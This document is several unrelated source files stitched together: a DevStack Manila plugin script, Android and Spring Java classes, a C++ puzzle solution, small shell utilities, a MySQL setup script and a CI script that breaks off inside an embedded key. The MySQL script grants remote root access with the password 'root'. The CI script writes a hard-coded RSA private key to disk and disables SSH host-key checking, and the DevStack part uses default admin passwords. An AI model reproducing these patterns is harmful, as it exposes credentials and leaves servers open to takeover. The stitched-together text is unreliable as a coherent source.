    MANILA_TEMPEST_PLUGIN_BRANCH=${MANILA_TEMPEST_PLUGIN_BRANCH:-master}
    MANILA_TEMPEST_PLUGIN_DIR=$DEST/manila-tempest-plugin
    git_clone $MANILA_TEMPEST_PLUGIN_REPO $MANILA_TEMPEST_PLUGIN_DIR $MANILA_TEMPEST_PLUGIN_BRANCH
    setup_develop $MANILA_TEMPEST_PLUGIN_DIR
}
# update_tempest - Function used for updating Tempest config if Tempest service enabled
function update_tempest {
    if is_service_enabled tempest; then

        TEMPEST_CONFIG=${TEMPEST_CONFIG:-$TEMPEST_DIR/etc/tempest.conf}
        ADMIN_TENANT_NAME=${ADMIN_TENANT_NAME:-"admin"}
        ADMIN_DOMAIN_NAME=${ADMIN_DOMAIN_NAME:-"Default"}
        ADMIN_PASSWORD=${ADMIN_PASSWORD:-"secretadmin"}

        # Only expose the service instance password when password auth is used
        if [ $(trueorfalse False MANILA_USE_SERVICE_INSTANCE_PASSWORD) == True ]; then
            iniset $TEMPEST_CONFIG share image_password $MANILA_SERVICE_INSTANCE_PASSWORD
        fi
        iniset $TEMPEST_CONFIG share image_with_share_tools $MANILA_SERVICE_IMAGE_NAME
        # Admin credentials
        iniset $TEMPEST_CONFIG auth admin_username ${ADMIN_USERNAME:-"admin"}
        iniset $TEMPEST_CONFIG auth admin_password ${ADMIN_PASSWORD:-"secretadmin"}
        iniset $TEMPEST_CONFIG auth admin_tenant_name $ADMIN_TENANT_NAME
        iniset $TEMPEST_CONFIG auth admin_domain_name $ADMIN_DOMAIN_NAME
        # Primary test credentials (demo)
        iniset $TEMPEST_CONFIG identity username ${TEMPEST_USERNAME:-"demo"}
        iniset $TEMPEST_CONFIG identity password $ADMIN_PASSWORD
        iniset $TEMPEST_CONFIG identity tenant_name ${TEMPEST_TENANT_NAME:-"demo"}
        iniset $TEMPEST_CONFIG identity domain_name $ADMIN_DOMAIN_NAME
        # Alternate test credentials (alt_demo)
        iniset $TEMPEST_CONFIG identity alt_username ${ALT_USERNAME:-"alt_demo"}
        iniset $TEMPEST_CONFIG identity alt_password $ADMIN_PASSWORD
        iniset $TEMPEST_CONFIG identity alt_tenant_name ${ALT_TENANT_NAME:-"alt_demo"}
        iniset $TEMPEST_CONFIG identity alt_domain_name $ADMIN_DOMAIN_NAME
    fi
}
# install_docker_ubuntu - install docker.io (plus apparmor) from the
# Ubuntu archive after refreshing the package index.
function install_docker_ubuntu {
    sudo apt-get update
    local pkg
    for pkg in apparmor docker.io; do
        install_package $pkg
    done
}
# install_docker_fedora - install docker from yum and make the daemon
# start now and on every boot.
function install_docker_fedora {
    sudo yum install -y docker
    local action
    for action in enable start; do
        sudo systemctl $action docker
    done
}
# download_image - fetch an image into $FILES (for http(s) URLs) or
# validate an existing local path (for file:// URLs).
#
# $1 - image URL.
# Returns non-zero when the image cannot be obtained so callers can stop
# instead of operating on a missing file. (Previously both failure paths
# used a bare ``return`` whose status was that of the preceding ``echo``,
# i.e. success, so failures went undetected.)
# NOTE(review): ``image`` is declared local, so callers cannot read it —
# they appear to recompute the path themselves; confirm before relying on it.
function download_image {
    local image_url=$1

    local image image_fname
    image_fname=`basename "$image_url"`
    if [[ $image_url != file* ]]; then
        # Downloads the image (uec ami+aki style), then extracts it.
        # Re-download when the cached copy is missing or zero bytes.
        if [[ ! -f $FILES/$image_fname || "$(stat -c "%s" $FILES/$image_fname)" = "0" ]]; then
            wget --progress=dot:giga -c $image_url -O $FILES/$image_fname
            if [[ $? -ne 0 ]]; then
                echo "Not found: $image_url"
                return 1
            fi
        fi
        image="$FILES/${image_fname}"
    else
        # File based URL (RFC 1738): ``file://host/path``
        # Remote files are not considered here.
        #   unix: ``file:///home/user/path/file``
        #   windows: ``file:///C:/Documents%20and%20Settings/user/path/file``
        image=$(echo $image_url | sed "s/^file:\/\///g")
        if [[ ! -f $image || "$(stat -c "%s" $image)" == "0" ]]; then
            echo "Not found: $image_url"
            return 1
        fi
    fi
}
# import_docker_service_image_ubuntu - download the gzipped Container
# driver image and load it into the local docker registry, unless an
# image with that name already exists.
function import_docker_service_image_ubuntu {
    GZIPPED_IMG_NAME=`basename "$MANILA_DOCKER_IMAGE_URL"`
    # Strip ".gz" to get the tarball name, then ".tar" to get the image name
    IMG_NAME_LOAD=${GZIPPED_IMG_NAME%.*}
    LOCAL_IMG_NAME=${IMG_NAME_LOAD%.*}
    if [[ -n "$(sudo docker images -q $LOCAL_IMG_NAME)" ]]; then
        # Already imported — nothing to do
        return
    fi
    download_image $MANILA_DOCKER_IMAGE_URL
    # Import image in Docker
    gzip -d $FILES/$GZIPPED_IMG_NAME
    sudo docker load --input $FILES/$IMG_NAME_LOAD
}
# remove_docker_service_image - delete the Container driver service image
# from the local docker registry (used during cleanup).
function remove_docker_service_image {
    sudo docker rmi $MANILA_DOCKER_IMAGE_ALIAS
}
# install_libraries - install NFS client tools needed by the
# host-assisted migration tests, which only run in multibackend mode.
function install_libraries {
    if [ $(trueorfalse False MANILA_MULTI_BACKEND) == True ]; then
        if [ $(trueorfalse True RUN_MANILA_HOST_ASSISTED_MIGRATION_TESTS) == True ]; then
            # Package name differs between Debian- and RPM-based distros
            local nfs_client_pkg=nfs-utils
            if is_ubuntu; then
                nfs_client_pkg=nfs-common
            fi
            install_package $nfs_client_pkg
        fi
    fi
}
# setup_ipv6 - configure dual-stack (IPv4+IPv6) networking for manila:
# kernel sysctls, address scopes and subnet pools, private/public networks,
# driver export IPs, and a Quagga BGP speaker for dynamic host routes.
function setup_ipv6 {

    # This will fail with multiple default routes and is not needed in CI
    # but may be useful when developing with devstack locally
    if [ $(trueorfalse False MANILA_RESTORE_IPV6_DEFAULT_ROUTE) == True ]; then
        # save IPv6 default route to add back later after enabling forwarding
        local default_route=$(ip -6 route | grep default | cut -d ' ' -f1,2,3,4,5)
    fi

    # make sure those system values are set
    sudo sysctl -w net.ipv6.conf.lo.disable_ipv6=0
    sudo sysctl -w net.ipv6.conf.all.accept_ra=2
    sudo sysctl -w net.ipv6.conf.all.forwarding=1

    # Disable in-band as our communication is only internal
    sudo ovs-vsctl set Bridge $PUBLIC_BRIDGE other_config:disable-in-band=true

    # Create address scopes and subnet pools
    openstack address scope create --share --ip-version 4 scope-v4
    openstack address scope create --share --ip-version 6 scope-v6
    openstack subnet pool create $SUBNETPOOL_NAME_V4 --default-prefix-length $SUBNETPOOL_SIZE_V4 --pool-prefix $SUBNETPOOL_PREFIX_V4 --address-scope scope-v4 --default --share
    openstack subnet pool create $SUBNETPOOL_NAME_V6 --default-prefix-length $SUBNETPOOL_SIZE_V6 --pool-prefix $SUBNETPOOL_PREFIX_V6 --address-scope scope-v6 --default --share

    # Create example private network and router
    openstack router create $Q_ROUTER_NAME
    openstack network create $PRIVATE_NETWORK_NAME
    openstack subnet create --ip-version 6 --use-default-subnet-pool --ipv6-address-mode $IPV6_ADDRESS_MODE --ipv6-ra-mode $IPV6_RA_MODE --network $PRIVATE_NETWORK_NAME $IPV6_PRIVATE_SUBNET_NAME
    openstack subnet create --ip-version 4 --use-default-subnet-pool --network $PRIVATE_NETWORK_NAME $PRIVATE_SUBNET_NAME
    openstack router add subnet $Q_ROUTER_NAME $IPV6_PRIVATE_SUBNET_NAME
    openstack router add subnet $Q_ROUTER_NAME $PRIVATE_SUBNET_NAME

    # Create public network
    openstack network create $PUBLIC_NETWORK_NAME --external --default --provider-network-type flat --provider-physical-network $PUBLIC_PHYSICAL_NETWORK
    local public_gateway_ipv6=$(openstack subnet create $IPV6_PUBLIC_SUBNET_NAME --ip-version 6 --network $PUBLIC_NETWORK_NAME --subnet-pool $SUBNETPOOL_NAME_V6 --no-dhcp -c gateway_ip -f value)
    local public_gateway_ipv4=$(openstack subnet create $PUBLIC_SUBNET_NAME --ip-version 4 --network $PUBLIC_NETWORK_NAME --subnet-range $FLOATING_RANGE --no-dhcp -c gateway_ip -f value)

    # Set router to use public network
    openstack router set --external-gateway $PUBLIC_NETWORK_NAME $Q_ROUTER_NAME

    # Configure interfaces due to NEUTRON_CREATE_INITIAL_NETWORKS=False
    local ipv4_cidr_len=${FLOATING_RANGE#*/}
    sudo ip -6 addr add "$public_gateway_ipv6"/$SUBNETPOOL_SIZE_V6 dev $PUBLIC_BRIDGE
    sudo ip addr add $PUBLIC_NETWORK_GATEWAY/"$ipv4_cidr_len" dev $PUBLIC_BRIDGE

    # Enabling interface is needed due to NEUTRON_CREATE_INITIAL_NETWORKS=False
    sudo ip link set $PUBLIC_BRIDGE up

    # Drivers that export directly from this host advertise both gateway IPs
    if [ "$SHARE_DRIVER" == "manila.share.drivers.lvm.LVMShareDriver" ]; then
        for backend_name in ${MANILA_ENABLED_BACKENDS//,/ }; do
            iniset $MANILA_CONF $backend_name lvm_share_export_ips $public_gateway_ipv4,$public_gateway_ipv6
        done
        iniset $MANILA_CONF DEFAULT data_node_access_ips $public_gateway_ipv4
    fi

    if [ "$SHARE_DRIVER" == "manila.share.drivers.cephfs.driver.CephFSDriver" ]; then
        for backend_name in ${MANILA_ENABLED_BACKENDS//,/ }; do
            iniset $MANILA_CONF $backend_name cephfs_ganesha_export_ips $public_gateway_ipv4,$public_gateway_ipv6
        done
        iniset $MANILA_CONF DEFAULT data_node_access_ips $public_gateway_ipv4
    fi

    # install Quagga for setting up the host routes dynamically
    install_package quagga

    # set Quagga daemons
    (
    echo "zebra=yes"
    echo "bgpd=yes"
    echo "ospfd=no"
    echo "ospf6d=no"
    echo "ripd=no"
    echo "ripngd=no"
    echo "isisd=no"
    echo "babeld=no"
    ) | sudo tee /etc/quagga/daemons > /dev/null

    # set Quagga zebra.conf
    (
    echo "hostname dsvm"
    echo "password openstack"
    echo "log file /var/log/quagga/zebra.log"
    ) | sudo tee /etc/quagga/zebra.conf > /dev/null

    # set Quagga vtysh.conf
    (
    echo "service integrated-vtysh-config"
    echo "username quagga nopassword"
    ) | sudo tee /etc/quagga/vtysh.conf > /dev/null

    # set Quagga bgpd.conf
    (
    echo "log file /var/log/quagga/bgpd.log"
    echo "bgp multiple-instance"
    echo "router bgp 200"
    echo " bgp router-id 1.2.3.4"
    echo " neighbor $public_gateway_ipv6 remote-as 100"
    echo " neighbor $public_gateway_ipv6 passive"
    echo " address-family ipv6"
    echo " neighbor $public_gateway_ipv6 activate"
    echo "line vty"
    echo "debug bgp events"
    echo "debug bgp filters"
    echo "debug bgp fsm"
    echo "debug bgp keepalives"
    echo "debug bgp updates"
    ) | sudo tee /etc/quagga/bgpd.conf > /dev/null

    # Quagga logging
    sudo mkdir -p /var/log/quagga
    sudo touch /var/log/quagga/zebra.log
    sudo touch /var/log/quagga/bgpd.log
    sudo chown -R quagga:quagga /var/log/quagga

    GetOSVersion
    QUAGGA_SERVICES="zebra bgpd"
    # BUGFIX: the previous code used "[[ is_ubuntu && ... ]]", which treats
    # is_ubuntu as an always-truthy string instead of running the function,
    # making the distro check a no-op. Call the function explicitly.
    if is_ubuntu && [[ "$os_CODENAME" == "xenial" ]]; then
        # In Ubuntu Xenial, the services bgpd and zebra are under
        # one systemd unit: quagga
        QUAGGA_SERVICES="quagga"
    elif is_fedora; then
        # Disable SELinux rule that conflicts with Zebra
        sudo setsebool -P zebra_write_config 1
    fi

    sudo systemctl enable $QUAGGA_SERVICES
    sudo systemctl restart $QUAGGA_SERVICES
    # log the systemd status
    sudo systemctl status $QUAGGA_SERVICES

    # This will fail with multiple default routes and is not needed in CI
    # but may be useful when developing with devstack locally
    if [ $(trueorfalse False MANILA_RESTORE_IPV6_DEFAULT_ROUTE) == True ]; then
        # add default IPv6 route back
        if ! [[ -z $default_route ]]; then
            # "replace" should ignore "RTNETLINK answers: File exists"
            # error if the route wasn't flushed by the bgp setup we did earlier.
            sudo ip -6 route replace $default_route
        fi
    fi
}
# Main dispatcher
# Entry point invoked by devstack's plugin mechanism: $1 is the phase
# (stack/unstack/clean) and $2 the step within the "stack" phase.
if [[ "$1" == "stack" && "$2" == "install" ]]; then
    echo_summary "Installing Manila Client"
    install_manilaclient
    echo_summary "Installing Manila"
    install_manila
    set_cinder_quotas
elif [[ "$1" == "stack" && "$2" == "post-config" ]]; then
    echo_summary "Configuring Manila"
    configure_manila
    echo_summary "Initializing Manila"
    init_manila
    echo_summary "Installing extra libraries"
    install_libraries
    echo_summary "Creating Manila entities for auth service"
    create_manila_accounts

    # Cinder config update: apply the oversubscription ratio to every
    # enabled cinder backend as well as the DEFAULT section.
    if is_service_enabled cinder && [[ -n "$CINDER_OVERSUBSCRIPTION_RATIO" ]]; then
        CINDER_CONF=${CINDER_CONF:-/etc/cinder/cinder.conf}
        CINDER_ENABLED_BACKENDS=$(iniget $CINDER_CONF DEFAULT enabled_backends)
        for BN in ${CINDER_ENABLED_BACKENDS//,/ }; do
            iniset $CINDER_CONF $BN lvm_max_over_subscription_ratio $CINDER_OVERSUBSCRIPTION_RATIO
        done
        iniset $CINDER_CONF DEFAULT max_over_subscription_ratio $CINDER_OVERSUBSCRIPTION_RATIO
    fi
elif [[ "$1" == "stack" && "$2" == "extra" ]]; then
    if is_service_enabled nova; then
        echo_summary "Creating Manila service flavor"
        create_manila_service_flavor

        echo_summary "Creating Manila service security group"
        create_manila_service_secgroup
    fi

    # Skip image downloads when disabled.
    # This way vendor Manila driver CI tests can skip
    # this potentially long and unnecessary download.
    if [ "$MANILA_SERVICE_IMAGE_ENABLED" = "True" ]; then
        echo_summary "Creating Manila service image"
        create_manila_service_image
    else
        echo_summary "Skipping download of Manila service image"
    fi

    if is_service_enabled nova; then
        echo_summary "Creating Manila service keypair"
        create_manila_service_keypair
    fi

    echo_summary "Configure Samba server"
    configure_samba

    echo_summary "Configuring IPv6"
    if [ $(trueorfalse False MANILA_SETUP_IPV6) == True ]; then
        setup_ipv6
    fi

    echo_summary "Starting Manila API"
    start_manila_api

    # Workaround for bug #1660304: for the generic driver the worker
    # services are started later, in the "test-config" step below.
    if [ "$SHARE_DRIVER" != "manila.share.drivers.generic.GenericShareDriver" ]; then
        echo_summary "Starting rest of Manila services - scheduler, share and data"
        start_rest_of_manila
    fi

    echo_summary "Creating Manila default share type"
    create_default_share_type

    echo_summary "Creating Manila default share group type"
    create_default_share_group_type

    echo_summary "Creating Manila custom share types"
    create_custom_share_types

    echo_summary "Manila UI is no longer enabled by default. \
Add enable_plugin manila-ui https://opendev.org/openstack/manila-ui \
to your local.conf file to enable Manila UI"
elif [[ "$1" == "stack" && "$2" == "test-config" ]]; then
    ###########################################################################
    # NOTE(vponomaryov): Workaround for bug #1660304
    # We are able to create Nova VMs now only when last Nova step is performed
    # which is registration of cell0. It is registered as last action in
    # "post-extra" section.
    if is_service_enabled nova; then
        echo_summary "Creating Manila service VMs for generic driver \
backends for which handlng of share servers is disabled."
        create_service_share_servers
    fi
    if [ "$SHARE_DRIVER" == "manila.share.drivers.generic.GenericShareDriver" ]; then
        echo_summary "Starting rest of Manila services - scheduler, share and data"
        start_rest_of_manila
    fi
    ###########################################################################

    if [ $(trueorfalse False MANILA_INSTALL_TEMPEST_PLUGIN_SYSTEMWIDE) == True ]; then
        echo_summary "Fetching and installing manila-tempest-plugin system-wide"
        install_manila_tempest_plugin
        export DEPRECATED_TEXT="$DEPRECATED_TEXT\nInstalling
manila-tempest-plugin can be done with the help of its own DevStack
plugin by adding: \n\n\t'enable_plugin manila-tempest-plugin
https://opendev.org/openstack/manila-tempest-plugin'.\n\nManila's
DevStack plugin will stop installing it automatically."
    fi

    echo_summary "Update Tempest config"
    update_tempest
fi

# Teardown phases
if [[ "$1" == "unstack" ]]; then
    cleanup_manila
fi

if [[ "$1" == "clean" ]]; then
    cleanup_manila
    # Remove config left behind by a previous deployment
    sudo rm -rf /etc/manila
fi

# Restore xtrace
$XTRACE
|
package io.github.marcelbraghetto.sunshinewatch.framework.core.dagger;
import android.content.Context;
import android.support.annotation.NonNull;
/**
* Created by <NAME> on 30/04/16.
*
* Dependency injector - lazily created to also allow Dagger to be available from any Android
* component that has a context.
*/
public final class Injector {
    private static InjectorComponent sAppComponent;

    // Static-only holder; never instantiated.
    private Injector() { }

    /**
     * Obtain the shared instance of the injector for dependency injection.
     * The component is built lazily on first use; synchronization guards
     * against concurrent first calls.
     *
     * @param context needed to resolve the injector.
     * @return shared instance of the dependency injector.
     */
    @NonNull
    public static synchronized InjectorComponent get(@NonNull Context context) {
        if (sAppComponent != null) {
            return sAppComponent;
        }
        // Use the application context so no Activity/Service is leaked.
        InjectorDaggerModule module =
                new InjectorDaggerModule(context.getApplicationContext());
        sAppComponent = DaggerInjectorComponent
                .builder()
                .injectorDaggerModule(module)
                .build();
        return sAppComponent;
    }
}
|
<reponame>unixing/springboot_chowder<gh_stars>10-100
package com.oven.controller;
import com.oven.utils.FileUtils;
import org.springframework.core.io.Resource;
import org.springframework.http.HttpHeaders;
import org.springframework.http.ResponseEntity;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.util.StringUtils;
import org.springframework.web.bind.annotation.*;
import org.springframework.web.multipart.MultipartFile;
import org.springframework.web.servlet.mvc.method.annotation.MvcUriComponentsBuilder;
import org.springframework.web.servlet.mvc.support.RedirectAttributes;
import java.util.stream.Collectors;
/**
 * Minimal file-upload demo: the index page lists previously uploaded files
 * with download links, GET /files/{filename} streams one back, and a POST
 * to "/" stores a new file via {@link FileUtils}.
 */
@Controller
public class DemoController {
    // Project helper that stores, lists and loads uploaded files.
    @javax.annotation.Resource
    private FileUtils fileUtils;

    /** Renders the upload page with an absolute download URL per stored file. */
    @GetMapping("/")
    public String index(Model model) {
        // Build each link by pointing MvcUriComponentsBuilder at the
        // download() handler below, so URLs stay in sync with the mapping.
        model.addAttribute("files", fileUtils
                .list()
                .map(path -> MvcUriComponentsBuilder
                        .fromMethodName(DemoController.class, "download", path.getFileName().toString())
                        .build()
                        .toString())
                .collect(Collectors.toList()));
        return "upload";
    }

    /**
     * Streams the named file as an attachment.
     * The {filename:.+} pattern keeps file extensions out of suffix matching.
     */
    @GetMapping("/files/{filename:.+}")
    @ResponseBody
    public ResponseEntity<Resource> download(@PathVariable String filename) {
        Resource file = fileUtils.loadAsResource(filename);
        return ResponseEntity
                .ok()
                .header(HttpHeaders.CONTENT_DISPOSITION, "attachment; filename=\"" + file.getFilename() + "\"")
                .body(file);
    }

    /**
     * Accepts an uploaded file and redirects back to the index with a flash
     * message (Chinese UI strings are intentional and left untouched).
     */
    @PostMapping("/")
    public String upload(@RequestParam("file") MultipartFile file, RedirectAttributes redirectAttributes) {
        if (StringUtils.isEmpty(file.getOriginalFilename())) {
            redirectAttributes.addFlashAttribute("message", "请选择文件!");
            return "redirect:/";
        }
        fileUtils.upload(file);
        redirectAttributes.addFlashAttribute("message", "上传【" + file.getOriginalFilename() + "】成功!");
        return "redirect:/";
    }
}
|
package kr.co.gardener.admin.controller.user;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.ResponseBody;
import kr.co.gardener.admin.model.user.History;
import kr.co.gardener.admin.model.user.list.BookmarkList;
import kr.co.gardener.admin.model.user.list.HistoryList;
import kr.co.gardener.admin.service.user.BookmarkService;
import kr.co.gardener.admin.service.user.HistoryService;
import kr.co.gardener.util.Pager;
/**
 * Admin CRUD controller for user authentication-history records, plus bulk
 * JSON endpoints for histories and bookmarks. Views are resolved relative
 * to {@code path} below.
 */
@Controller
@RequestMapping("/admin/history")
public class HistoryController {
    // View-name prefix for all templates rendered by this controller.
    final String path = "/admin/users/history/";
    @Autowired
    HistoryService service;
    @Autowired
    BookmarkService bookmarkService;

    /** Main listing page. */
    @RequestMapping({ "/", "" })
    public String list(Model model) {
        return path + "main";
    }

    /** Shows the add-history form. */
    @GetMapping("/add")
    public String add() {
        return path + "add";
    }

    /** Persists a new history record, then redirects to the list. */
    @PostMapping("/add")
    public String add(History item) {
        service.add(item);
        return "redirect:list";
    }

    /** Shows the edit form pre-populated with the selected record. */
    @GetMapping("/update/{historyId}")
    public String update(@PathVariable int historyId, Model model) {
        History item = service.item(historyId);
        model.addAttribute("item", item);
        return path + "update";
    }

    /** Applies the edit; the path id wins over any id in the form body. */
    @PostMapping("/update/{historyId}")
    public String update(@PathVariable int historyId, History item) {
        item.setHistoryId(historyId);
        service.update(item);
        return "redirect:../list";
    }

    /** Deletes a single record, then redirects to the list. */
    @RequestMapping("/delete/{historyId}")
    public String delete(@PathVariable int historyId) {
        service.delete(historyId);
        return "redirect:../list";
    }

    // Bulk bookmark operations --------------------------------------------

    /** Returns a page of bookmarks as JSON. */
    @RequestMapping("/api/bookmark")
    @ResponseBody
    public BookmarkList bookmarkList(Pager pager) {
        BookmarkList item = bookmarkService.list_pager(pager);
        return item;
    }

    @ResponseBody
    @PostMapping("/add/bookmark")
    public String bookmarkAdd(@RequestBody BookmarkList list) {
        bookmarkService.insert_list(list);
        return "ok";
    }

    @ResponseBody
    @RequestMapping("/delete/bookmark")
    public String bookmarkDelete(@RequestBody BookmarkList list) {
        bookmarkService.delete_list(list);
        return "ok";
    }

    @ResponseBody
    @PostMapping("/update/bookmark")
    public String bookmarkUpdate(@RequestBody BookmarkList list) {
        bookmarkService.update_list(list);
        return "ok";
    }

    // Bulk authentication-history operations ------------------------------

    /** Returns a page of history records as JSON. */
    @RequestMapping("/api/history")
    @ResponseBody
    public HistoryList historyList(Pager pager) {
        HistoryList item = service.list_pager(pager);
        return item;
    }

    @ResponseBody
    @PostMapping("/add/history")
    public String historyAdd(@RequestBody HistoryList list) {
        service.insert_list(list);
        return "ok";
    }

    @ResponseBody
    @RequestMapping("/delete/history")
    public String historyDelete(@RequestBody HistoryList list) {
        service.delete_list(list);
        return "ok";
    }

    @ResponseBody
    @PostMapping("/update/history")
    public String historyUpdate(@RequestBody HistoryList list) {
        service.update_list(list);
        return "ok";
    }
}
|
#include<bits/stdc++.h>
using namespace std;
// string convert2Bin(long long int num) {
// if(num == 1) return "1";
// string result = "";
// long long int size = 0;
// long long int n = num;
// while(n) {
// if(n%2 == 0) result = '0' + result;
// else {
// result = '1' + result;
// }
// n = long long int(n/2);
// ++size;
// }
// return result;
// }
// long long int findMax(long long int num) {
// // string n = convert2Bin(num);
// string n = "100101";
// string a = "", b = "";
// long long int size = n.length();
// for(long long int i=size-1; i>=0; i--) {
// if(i==0) {
// a = '1' + a;
// b = '0' + b;
// }
// else if(n[i] == '0') {
// a = '1' + a;
// b = '1' + b;
// }
// else {
// a = '0' + a;
// b = '1' + b;
// }
// }
// long long int A = stoi(a, 0, 2);
// long long int B = stoi(b, 0, 2);
// long long int N = stoi(n, 0, 2);
// cout << "N: " << N << endl;
// cout << a << ": " << A << endl;
// cout << b << ": " << B << endl;
// return A * B;
// }
// Count how many binary digits are needed to represent num
// (returns 0 for num == 0).
long long int findNumOfBits(long long int num){
    long long int bits = 0;
    while (num) {
        num /= 2;
        ++bits;
    }
    return bits;
}
// Returns the maximum product a*b where b is the all-ones value one bit
// shorter than num and a = num ^ b (so a XOR b == num).
//
// Fixed: the original computed b with pow(2, size-1) - 1, which evaluates
// in double and silently loses exactness once size-1 exceeds 53 bits.
// Integer shifts keep the result exact across the full long long range,
// and bits == 0 (num == 0) no longer relies on pow's negative exponent.
long long int findMax(long long int num) {
    long long int bits = 0;
    for (long long int n = num; n; n /= 2) {
        ++bits;
    }
    long long int b = (bits > 0) ? ((1LL << (bits - 1)) - 1) : 0;
    long long int a = num ^ b;
    return a * b;
}
// Reads a test count t, then for each of t inputs n prints findMax(n).
int main() {
    long long int t;
    cin >> t;
    while (t-- > 0) {
        long long int n;
        cin >> n;
        cout << findMax(n) << endl;
    }
}
#!/bin/bash
# Print "free/total" for the root filesystem, e.g. " 12G/40G".
disk_info=$(df -h / | awk '/\//{ printf("%4s/%s \n", $4, $2) }')
# Quote the expansion: unquoted, word splitting collapses the %4s padding
# produced by awk and would break on any embedded glob characters.
echo "${disk_info}"
|
#!/usr/bin/env bash
# Provision MySQL with root/root credentials and allow remote connections.
sudo apt-get update
# Pre-seed the root password so the mysql-server install is non-interactive.
sudo debconf-set-selections <<< 'mysql-server mysql-server/root_password password root'
sudo debconf-set-selections <<< 'mysql-server mysql-server/root_password_again password root'
sudo apt-get install -y --force-yes vim curl python-software-properties
sudo apt-get update --fix-missing
sudo apt-get -y --force-yes install mysql-server
# Comment out bind-address so MySQL listens on all interfaces.
# Fixed: sed needs sudo here — /etc/mysql/my.cnf is root-owned, so the
# original in-place edit silently failed for a non-root provisioning user.
sudo sed -i "s/^bind-address/#bind-address/" /etc/mysql/my.cnf
# Create a remote-capable root user and raise the connect-error threshold.
mysql -u root -proot -e "CREATE USER 'root'@'%' IDENTIFIED BY 'root';GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES; SET GLOBAL max_connect_errors=10000;"
sudo /etc/init.d/mysql restart
|
#!/bin/bash
# Copyright (c) 2017 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Trace every command and show where this job is running.
set -x
cat /etc/hostname
cat /etc/hosts
# Robot Framework outputs to archive after the run.
ARCHIVE_ARTIFACTS=(log.html output.xml report.html)
# Absolute path of this script's directory; also the Python import root.
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
export PYTHONPATH=${SCRIPT_DIR}
export DEBIAN_FRONTEND=noninteractive
sudo apt-get -y update
sudo apt-get -y install libpython2.7-dev python-virtualenv
# Candidate VIRL hosts; one healthy host is picked at random further below.
VIRL_SERVERS=("10.30.51.28" "10.30.51.29" "10.30.51.30")
VIRL_SERVER=""
VIRL_USERNAME=jenkins-in
VIRL_PKEY=priv_key
# A server advertises readiness via this file containing "PRODUCTION".
VIRL_SERVER_STATUS_FILE="status"
VIRL_SERVER_EXPECTED_STATUS="PRODUCTION"
SSH_OPTIONS="-i ${VIRL_PKEY} -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o BatchMode=yes -o LogLevel=error"
DPDK_VERSION=16.11.1
DPDK_DIR=dpdk
DPDK_PACKAGE=${DPDK_DIR}"-"${DPDK_VERSION}.tar.xz
# Run ssh with the shared options, echoing the command first for the log.
# Fixed: "$@" is quoted so arguments containing spaces (e.g. remote
# commands) are forwarded as the caller passed them; bare $@ re-splits
# them. SSH_OPTIONS stays unquoted on purpose — it holds multiple flags.
function ssh_do() {
    echo
    echo "### " ssh "$@"
    ssh ${SSH_OPTIONS} "$@"
}
# SECURITY NOTE(review): a private SSH key is embedded in this script and
# therefore in version control. It should be supplied by the CI credential
# store instead — anyone with read access to this file can reach the VIRL
# hosts. Left in place here because removing it breaks the job.
rm -f ${VIRL_PKEY}
cat > ${VIRL_PKEY} <<EOF
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA+IHXq87GcqMR1C47rzx6Cbip5Ghq8pKrbqKrP5Nf41HcYrT6
GOXl9nFWKsMOzIlIn+8y7Il27eZh7csQGApbg8QLiHMtcYEmWNzKZpkqg4nuAPxX
VXwlKgnKX902SrET9Gp9TDayiHtCRWVfrlPPPSA0UEXW6BjLN/uHJ+W/Xzrrab+9
asBVa05vT2W6n0KJ66zfCaeDM912mQ6SttscAwFoWDmdHlegiVqrlIG2ABxOvxxz
L3dM3iSmlmQlzv9bThjo+nI4KFYh6m5wrZmAo5r/4q9CIJc21HVnTqkGOWJIZz6J
73lePJVSq5gYqaoGw3swFEA/MDkOx7baWKSoLQIDAQABAoIBAQCNBeolNp+JWJ76
gQ4fwLsknyXSV6sxYyhkDW4PEwwcTU06uqce0AAzXVffxne0fMe48x47+zqBgPbb
4huM+Pu8B9nfojUMr5TaYtl9Zbgpk3F8H7dT7LKOa6XrxvZTZrADSRc30+Z26zPN
e9zTaf42Gvt0/l0Zs1BHwbaOXqO+XuwJ3/F9Sf3PQYWXD3EOWjpHDP/X/1vAs6lV
SLkm6J/9KKE1m6I6LTYjIXuYt4SXybW6N2TSy54hhQtYcDUnIU2hR/PHVWKrGA0J
kELgrtTNTdbML27O5gFWU4PLUEYTZ9fN11D6qUZKxLcPOiPPHXkiILMRCCnG5DYI
ksBAU/YlAoGBAPxZO9VO18TYc8THV1nLKcvT2+1oSs1UcA2wNQMU55t910ZYinRa
MRwUhMOf8Mv5wOeiZaRICQB1PnVWtDVmGECgPpK6jUxqAwn8rgJcnoafLGL5YKMY
RVafTe6N5LXgCaOcJrk21wxs6v7ninEbUxxc575urOvZMBkymDw91dwbAoGBAPwa
YRhKhrzFKZzdK0RadVjnxKvolUllpoqqg3XuvmeAJHAOAnaOgVWq68NAcp5FZJv0
2D2Up7TX8pjf9MofP1SJbcraKBpK4NzfNkA0dSdEi+FhVofAJ9umB2o5LW1n7sab
UIrjsdzSJK/9Zb9yTTHPyibYzNEgaJV1HsbxfEFXAoGAYO2RmvRm0phll18OQVJV
IpKk9kLKAKZ/R/K32hAsikBC8SVPQTPniyaifFWx81diblalff2hX4ipTf7Yx24I
wMIMZuW7Im/R7QMef4+94G3Bad7p7JuE/qnAEHJ2OBnu+eYfxaK35XDsrq6XMazS
NqHE7hOq3giVfgg+C12hCKMCgYEAtu9dbYcG5owbehxzfRI2/OCRsjz/t1bv1seM
